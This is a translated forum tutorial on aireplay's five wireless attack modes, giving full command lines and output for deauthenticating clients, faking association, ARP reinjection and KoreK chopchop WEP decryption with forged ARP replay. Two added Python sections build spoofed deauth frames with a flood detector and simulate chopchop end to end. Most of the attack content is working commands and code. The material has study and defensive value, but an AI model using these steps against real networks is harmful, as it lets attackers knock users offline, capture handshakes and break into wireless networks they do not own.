Most of this article is translated from the aircrack package's author. It was tested only in a lab environment; do not use it for illegal attempts.

Anyone with some experience knows the role aireplay plays in cracking. If your experiments keep failing, the material below should help. aireplay has five attack modes, each for a different situation; they are covered one by one.

In the examples below, 00:13:10:30:24:9C is the MAC address of the AP (wireless router, on channel 6) and 00:09:5B:EB:C5:2B is the client's MAC address.

+ Attack 0: deauthentication

This attack forcibly disconnects a client from the AP so that it reconnects. While it reconnects you can capture the WPA handshake and valid WEP IVs, and it produces the ARP traffic that the -3 attack needs. This is very effective in practice: if a client is associated but nobody is using the network, there is no traffic, and even -3 (see below) has no ARP request to replay. If you run -0 alongside -3, the -3 attack kicks in immediately, because a client that reassociates re-ARPs for its gateway. Obviously, without an associated client this attack is pointless.

Some examples:

  o WPA handshake capture with an Atheros card

      airmon.sh start ath0
      airodump ath0 out 6
      (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
      (wait for a few seconds)
      aircrack -w /path/to/dictionary out.cap

  o ARP request generation with a Prism2 card

      airmon.sh start wlan0
      airodump wlan0 out 6
      (switch to another console)
      aireplay -0 5 -a 00:13:10:30:24:9C wlan0
      aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

Parameters: `aireplay -0 5` runs the deauthentication five times; with 0 it loops forever, and the client is kicked off again and again and cannot use the network. -a is followed by the AP's MAC address. -c, the MAC of the client to deauthenticate (as in the first example), is optional: with it only that client is hit, without it the deauthentication is sent to the broadcast address and hits every client of that AP. wlan0 is your own interface name; check it with ifconfig -a (it may also be wifi0, ath1 and so on). Plenty of posts cover this, so it is not repeated here.

+ Attack 1: fake authentication

This attack is of some use when no legitimate client is associated with the AP: here we fake a client and get it associated. It can be combined with -3 (ARP request reinjection) and -4 ("chopchop" WEP decryption). If there is a real client, running -3 or -4 against it is more effective. In practice, if there is no client at all, this attack alone will very likely get you nowhere: association by itself generates no traffic, and -3 still needs an ARP request to replay and -4 at least one WEP data packet.

    aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
    12:14:06 Sending Authentication Request
    12:14:06 Authentication successful
    12:14:06 Sending Association Request
    12:14:07 Association successful :-)

Note: with patched madwifi CVS 2005-08-14, it is possible to inject packets while in Managed mode (the WEP key itself doesn't matter, as long as the AP accepts Open-System authentication). So, instead of running attack 1, you may just associate and inject / monitor through the athXraw interface:

    ifconfig ath0 down hw ether 00:10:20:30:40:50
    iwconfig ath0 mode Managed essid myap key AAAAAAAAAA
    ifconfig ath0 up

    sysctl -w dev.ath0.rawdev=1
    ifconfig ath0raw up
    airodump ath0raw out 6

Then you can run attack 3 or 4 (aireplay will automatically replace ath0 with ath0raw below):

    aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0
    aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0

Some access points require you to reassociate every 30 seconds, otherwise the fake client is considered disconnected. In this case, set up the periodic re-association delay:

    aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
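What attack 0 actually puts on the air, and what it looks like to a monitor, as an added example written for this page (it is not code from the post or from aircrack): a builder for the 802.11 deauthentication frame, a parser for it, and a sliding-window count that flags the burst a -0 run produces against a (BSSID, target) pair. Management frames carry no authentication in WEP/WPA networks of this era, so addr2 is whatever the sender writes into it, which is the whole reason the attack works. The MACs are the post's; the duration value, reason code, timestamps, per-round frame counts, detection window and threshold are constructed assumptions.

```python
"""The deauthentication frame `aireplay -0` sends, and a flood detector for it.
Added example, not code from the post or from aircrack. Layout: 802.11
management header (frame control, duration, addr1, addr2, addr3, sequence
control) followed by a 2-byte reason code. Timing/threshold values are constructed."""
import struct

DEAUTH_SUBTYPE = 12
BROADCAST = b"\xff" * 6          # what -0 without -c addresses: every client of the AP

def mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))

def build_deauth(dst: bytes, src: bytes, bssid: bytes, seq: int, reason: int = 7) -> bytes:
    """Deauth addressed to dst, claiming to come from src. Nothing checks src:
    the attacker just writes the AP's (or the client's) MAC into addr2.
    Reason 7 = 'class 3 frame received from nonassociated station' (constructed choice)."""
    fc = bytes([DEAUTH_SUBTYPE << 4, 0x00])      # version 0, type 0 (management), no flags
    return (fc + struct.pack("<H", 0x013A) + dst + src + bssid
            + struct.pack("<H", (seq & 0xFFF) << 4) + struct.pack("<H", reason))

def parse_deauth(frame: bytes):
    """(dst, src, bssid, seq, reason) if frame is a deauthentication, else None."""
    if len(frame) < 26 or frame[0] & 0x0C or frame[0] >> 4 != DEAUTH_SUBTYPE:
        return None
    seq_ctrl, reason = struct.unpack("<HH", frame[22:26])
    return frame[4:10], frame[10:16], frame[16:22], seq_ctrl >> 4, reason

def deauth_floods(frames, window: float = 5.0, threshold: int = 10) -> dict:
    """Flag (bssid, dst) pairs that see >= threshold deauths within `window` seconds.
    A genuine disconnect is one frame; -0 is a burst of them. Returns the peak count."""
    stamps = {}
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is not None:
            dst, _src, bssid, _seq, _reason = parsed
            stamps.setdefault((bssid, dst), []).append(ts)
    flagged = {}
    for key, times in stamps.items():
        times.sort()
        lo = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:       # slide the window's left edge
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged[key] = max(flagged.get(key, 0), hi - lo + 1)
    return flagged

AP_MAC, CLIENT = mac("00:13:10:30:24:9C"), mac("00:09:5B:EB:C5:2B")

def sample_capture():
    """Constructed trace: five rounds of spoofed deauths in both directions (the
    shape of `aireplay -0 5 -a AP -c CLIENT`; frames per round are made up), then
    one ordinary disconnect on another AP and a data frame the parser must ignore."""
    frames, t = [], 100.0
    for _ in range(5):
        for k in range(8):
            frames.append((t, build_deauth(CLIENT, AP_MAC, AP_MAC, 100 + k)))   # "AP" -> client
            frames.append((t, build_deauth(AP_MAC, CLIENT, AP_MAC, 200 + k)))   # "client" -> AP
            t += 0.02
        t += 0.3
    other = mac("00:11:22:33:44:55")                                          # constructed BSSID
    frames.append((t + 60, build_deauth(CLIENT, other, other, 7, reason=3)))
    frames.append((t + 61, b"\x08\x00" + bytes(30)))                          # a data frame
    return frames
```

deauth_floods(sample_capture()) flags both directions of the spoofed burst at 40 frames each and leaves the single genuine disconnect alone. Keying on (BSSID, addr1) is deliberate: a broadcast deauth from an attacker that omitted -c shows up as (BSSID, ff:ff:ff:ff:ff:ff), which is rarely legitimate at any rate.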
+ Attack 2: interactive packet replay

On its own this mode is of little use and mainly serves for testing, but it is also how a packet you forged yourself gets replayed: attack 4 below ends with `aireplay -2 -r arp.cap`.

    aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0

+ Attack 3: ARP-request reinjection

This is the most effective attack mode. You can use either a legitimate client or, combined with -1, a fake one. Usually you have to wait a few minutes until a usable ARP request appears; if there is no traffic at all, the attack fails. In practice, if no ARP request passes between the legitimate client and the AP for a long time, try running the -0 attack at the same time.

Please note that you can also reuse ARP requests from a previous capture using the -r switch.

    aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
    Saving ARP requests in replay_arp-0627-121526.cap
    You must also start airodump to capture replies.
    Read 2493 packets (got 1 ARP requests), sent 1305 packets...

+ Attack 4: KoreK's "chopchop" (CRC prediction)

This mode is not used often, but when it succeeds it decrypts a WEP packet without knowing the key. It can even work against dynamic WEP. It does not recover the WEP key itself, only the plaintext of that one packet, plus the keystream for that IV as a by-product (the .xor file), which is what lets you forge a packet of your own in step 3. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter than 60 bytes. This attack requires at least one WEP data packet.

1. First, we decrypt one packet:

    aireplay -4 -h 00:09:5B:EB:C5:2B ath0

2. Let's have a look at the IP address:

    tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
    reading from file replay_dec-0627-022301.cap, link-type [...]
    IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1

3. Then, forge an ARP request. The source IP (192.168.1.100) doesn't matter, but the destination IP (192.168.1.2) must respond to ARP requests. The source MAC must belong to an associated station, otherwise the AP discards the frame.

    ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
        00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap

4. And replay our forged ARP request:

    aireplay -2 -r arp.cap ath0
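Attack 4 and steps 3 and 4 above, worked through offline, as an added example written for this page (not code from the post, nor aircrack's or aireplay's): a constructed access point that knows a constructed key and only tells the attacker whether a frame's ICV checks out, and an attacker that never sees the key. It chops the last byte of a captured frame and, for each of the 256 candidate values of that plaintext byte, XORs a key-independent correction into the last four bytes until the AP accepts the shortened frame; each accepted frame gives up one keystream byte. The AP drops bodies shorter than a constructed cut-off, standing in for the 60-byte behaviour the text mentions, and the bytes below the cut-off come from the LLC/SNAP header, which is known plaintext for an IP frame. The recovered keystream then encrypts a forged ARP request (the post's MACs and IPs) that the AP accepts, which is what arpforge followed by `aireplay -2 -r` does. Only the encrypted body is modelled; the 802.11 header, the IV field and the radio are left out, and the key, IV and captured ICMP frame are constructed test data.

```python
"""KoreK chopchop against WEP's CRC-32 ICV, simulated end to end. Added example,
not code from the post or from aircrack/aireplay. The AP is a constructed oracle
(knows the key, answers only "ICV valid or not", drops short frames); the attacker
side never touches the key. Key, IV and the captured frame are constructed."""
import functools
import zlib

@functools.lru_cache(maxsize=None)    # caching is a simulation speed-up only
def rc4(key: bytes, n: int) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def icv(msg: bytes) -> bytes:
    return zlib.crc32(msg).to_bytes(4, "little")     # WEP ICV: CRC-32, LSB first

def wep_encrypt(key: bytes, iv: bytes, msg: bytes) -> bytes:
    body = msg + icv(msg)
    return xor(body, rc4(iv + key, len(body)))

def wep_decrypt(key: bytes, iv: bytes, ct: bytes):
    body = xor(ct, rc4(iv + key, len(ct)))
    return body[:-4], icv(body[:-4]) == body[-4:]

class AccessPoint:
    MIN_BODY = 8     # constructed cut-off, like real APs dropping data frames < 60 bytes
    def __init__(self, key: bytes):
        self._key = key
    def accepts(self, iv: bytes, ct: bytes) -> bool:   # the only thing the attacker sees
        return len(ct) >= self.MIN_BODY and wep_decrypt(self._key, iv, ct)[1]

# --- attacker side: only the captured frame and the oracle --------------------
CRC_TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
    CRC_TABLE.append(c)
INV_TOP = {t >> 24: i for i, t in enumerate(CRC_TABLE)}   # top bytes are a permutation
assert len(INV_TOP) == 256

def chop_correction(last_plain: int) -> bytes:
    """XOR mask for the last 4 bytes of a frame whose final byte was chopped off,
    giving it a valid ICV again if that byte's plaintext was `last_plain`. Follows
    from the CRC-32 byte step r' = (r >> 8) ^ T[(r ^ b) & 0xFF]; the key never enters."""
    i = INV_TOP[last_plain ^ 0xFF]
    return ((i ^ 0xFF) | ((CRC_TABLE[i] << 8) & 0xFFFFFF00)).to_bytes(4, "little")

def chopchop(ap: AccessPoint, iv: bytes, ct: bytes) -> dict:
    """Keystream bytes {position: value}, recovered from the end of `ct` backwards
    until the AP stops accepting (frame too short)."""
    ks, frame = {}, ct
    while len(frame) > 4:
        pos, chopped = len(frame) - 1, frame[:-1]
        for guess in range(256):
            cand = chopped[:-4] + xor(chopped[-4:], chop_correction(guess))
            if ap.accepts(iv, cand):             # a real AP relays only valid frames
                ks[pos] = frame[pos] ^ guess     # chopped byte: ciphertext ^ plaintext
                frame = cand
                break
        else:
            break                                # all 256 dropped: hit the cut-off
    return ks

LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")    # known plaintext of an IP frame
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")

def full_keystream(ct: bytes, ks: dict, known_head: bytes) -> bytes:
    """Fill the positions below the cut-off from the known LLC/SNAP header."""
    if any(p not in ks for p in range(len(known_head), len(ct))):
        raise ValueError("chopchop left a keystream gap above the header")
    head = xor(ct[:len(known_head)], known_head)
    return head + bytes(ks[p] for p in range(len(known_head), len(ct)))

def forge(keystream: bytes, msg: bytes) -> bytes:
    """Steps 3-4 of the post (arpforge, then aireplay -2): same IV, valid ICV, no key."""
    body = msg + icv(msg)
    if len(body) > len(keystream):
        raise ValueError("message longer than the recovered keystream")
    return xor(body, keystream)

# --- constructed data ---------------------------------------------------------
KEY = bytes.fromhex("0102030405")     # 40-bit WEP key; the attacker never sees it
IV = bytes.fromhex("a1b2c3")
# "ICMP echo request 192.168.1.2 -> 192.168.1.255", checksums zeroed; only the
# 44-byte plaintext length matters here.
CAPTURED_MSG = (LLC_SNAP_IP
                + bytes.fromhex("450000240001000040010000c0a80102c0a801ff")
                + bytes.fromhex("0800000000010001") + b"chopchop")
ARP_REQUEST = LLC_SNAP_ARP + bytes.fromhex(           # who-has 192.168.1.2 tell 192.168.1.100
    "0001080006040001" "00095bebc52b" "c0a80164" "000000000000" "c0a80102")
AP = AccessPoint(KEY)
CAPTURED_CT = wep_encrypt(KEY, IV, CAPTURED_MSG)     # what airodump would have saved

def run_attack():
    """Returns (decrypted captured frame, forged ARP request ciphertext)."""
    keystream = full_keystream(CAPTURED_CT, chopchop(AP, IV, CAPTURED_CT), LLC_SNAP_IP)
    return xor(CAPTURED_CT, keystream)[:-4], forge(keystream, ARP_REQUEST)
```

run_attack() decrypts the captured frame byte for byte and returns an ARP request the AP accepts, although the key was never used on the attacker side. The mask in chop_correction comes straight from the CRC-32 byte update, which is why no key is needed and why a CRC makes a poor integrity check: flipping message bits changes the ICV in a predictable, linear way. For the same reason a candidate either has exactly the right ICV or not, so there are no false positives among the 256 guesses, only the cut-off stops the attack.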
————————————————————————
Reply-to-view removed, and this post marked as featured. Tange/2008.6.4